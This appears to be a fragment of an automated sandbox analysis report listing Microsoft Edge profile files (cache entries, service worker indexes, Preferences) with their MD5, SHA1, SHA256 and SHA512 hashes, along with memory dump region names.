SHA512 885c48c8334a6ae4296692bb001470b7d2a04804e1265bd472b990eee3499785e97f5c9a8169a0a850261156492a6c9d56451998cf3e00911afbeb0cbb7a96f2

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 1241af26eaec6bac9e86569f50c70f3c
SHA1 0edc7946f8a26ad4629c176f90a0b86ba9074dd0
SHA256 3ffee69e873e4dc3953dbad6db7b10e0047d8ec1787b365929902af21e6ba148
SHA512 741fbc1ee6be09a536af94ca8e6d03017346c0ff1e55653a9f9b095e5a640eb9463a55fb3ca6e10d623c1fb498e2b8148e955be55ef7a8e334483ed5904854f3

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index

MD5 ed6e7a5a683b54729c5576fdaa71dd2b
SHA1 ba865b13665e79cdc296caec3f99deac2b4adef9
SHA256 93e1b1a213b5965404c468ac28d80efaec03116c486ce6a5981604ddaaaead9b
SHA512 1bdfc822af830cbfb17b84bb949ccce520fb6ed87fd1598091f0f36869543ef8229fb1b0f68490dc20e1c3b503807ac23a0ee660642eb4e59777987592610802

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00006a

MD5 ee32983357800a1c73ce1f62da083101
SHA1 467c2215d2bcc003516319be703bf52099303d3d
SHA256 173b1020764ed0b48e21882bb888025edc6560672f29fa3241712bf172e684cd
SHA512 45e9f3fb39f15066ecf6fb2711abc19586f3165c12f7d8adf9503bd51d31a50594e59cd4c02196491f11516b074e105e0409c4fe468e2f89f53582eff8932f3a

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00005a

MD5 3df01456ef7248b94ac7622830395b82
SHA1 f5c2d24e2e6981c214b731cdc4d10cccd3424c6d
SHA256 74218a640c8bff89436945d4cedf1d5bf213285458c36d626e8970c7149c0f93
SHA512 06ab8af0ad993243a3700282e1a6cb4d9a1ca221a6633359ecb85d32e8125b8344db0cdd757bb8d2b36bd54a53fd40a6e922ffba49fb40a60a50ce0aeb5bfb0c

memory/8840-3018-0x00007FF67D520000-0x00007FF67DAC1000-memory.dmp

memory/3432-3019-0x0000000001080000-0x00000000010A0000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\8f7abdeb3486c1b8780fede76afc20e044eff1b5\0f221d28-2146-4195-866c-1f0c6ef09ee7\index-dir\the-real-index

MD5 96b96bc9e38fb4c0c2ae3add1f390bf3
SHA1 a23057416ccfe8908ac2839e15fd1764183571c8
SHA256 12f5422459dc130ef225ed2f4034d0504f4805ffad830663e77e302edf7e5994
SHA512 a8fd7ed0e5a3bf0bdd1f412c74b6cf2115a63fbc2b965f84402aabfadaff96d9a007cbcf7d0df3f4b8806f5fc1b54a309508badce138c693055076da139b444f

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\8f7abdeb3486c1b8780fede76afc20e044eff1b5\0f221d28-2146-4195-866c-1f0c6ef09ee7\index-dir\the-real-index~RFe592968.TMP

MD5 1c5f74b785b602075f8d4b85048aa395
SHA1 2912df8eae2ce5a008b2c9d6b0cb840abda281c0
SHA256 9db12ab54082210f18dd9c92843927b1f5eb48b50b65795f4bd6c68df121b0b6
SHA512 db111fdc94f049af05ef8d959e55456965098536f84d676f50bc7d20e66e33298d5f622aa3d61961f4f670c7cfd8ecace0033ea8c48c29b478474c674cd5f252

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 79d1ce287f5b6198822b820629e23d6c
SHA1 4ffaf537a16de58843e854fa8b3580033148a557
SHA256 c0c4eb402bbef788a38c0ca82822385021a8090658e2322a1e71836e045bca0c
SHA512 57dd902c069bcbafdc1acf6c5a4dd082178a55b65b6b4bde7d4c80988226a4b548da7d7536e8e068b9621f881138aebbcad01535dd6ba0077f55519f39f7beb8